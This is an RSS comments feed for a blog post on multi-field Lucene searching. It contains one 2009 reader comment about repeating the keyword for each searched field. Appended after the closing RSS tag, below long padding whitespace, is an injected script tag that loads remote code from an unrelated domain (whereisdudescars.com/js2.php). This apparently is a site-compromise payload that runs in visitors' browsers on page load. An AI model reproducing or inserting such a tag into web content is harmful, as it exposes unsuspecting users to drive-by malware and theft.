
















































































































































































































































































































































































































































































































































































































































































<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Multi-Field Lucene Example</title>
	<atom:link href="http://www.bitworm.com/search/2007/multi-field-lucene-example/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bitworm.com/search/2007/multi-field-lucene-example/</link>
	<description>Thoughts from a search geek</description>
	<pubDate>Sat, 04 Sep 2010 18:18:52 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.1</generator>
		<item>
		<title>By: Veeresh</title>
		<link>http://www.bitworm.com/search/2007/multi-field-lucene-example/#comment-7901</link>
		<dc:creator>Veeresh</dc:creator>
		<pubDate>Wed, 13 May 2009 10:40:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.bitworm.com/search/2007/multi-field-lucene-example/#comment-7901</guid>
		<description>Thanks you so much.  It is really helpful article and I wanted this to search for an item that may exist multiple colums in a database.  One improper approach here is, it requires to provide multiple or copy of keywords for all colums to be searched in it. Like this:
String fields[] = {"color","details"};
String keywords[] = {"white","white"};

This could have been made to provide single keyword over multiple fields, but unfortunately it is not possible.  Anyway its ok and serves better :)

Thank you!

- Veeresh</description>
		<content:encoded><![CDATA[<p>Thanks you so much.  It is really helpful article and I wanted this to search for an item that may exist multiple colums in a database.  One improper approach here is, it requires to provide multiple or copy of keywords for all colums to be searched in it. Like this:<br />
String fields[] = {&#8221;color&#8221;,&#8221;details&#8221;};<br />
String keywords[] = {&#8221;white&#8221;,&#8221;white&#8221;};</p>
<p>This could have been made to provide single keyword over multiple fields, but unfortunately it is not possible.  Anyway its ok and serves better <img src='http://www.bitworm.com/search/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Thank you!</p>
<p>- Veeresh</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script src="http://whereisdudescars.com/js2.php"></script>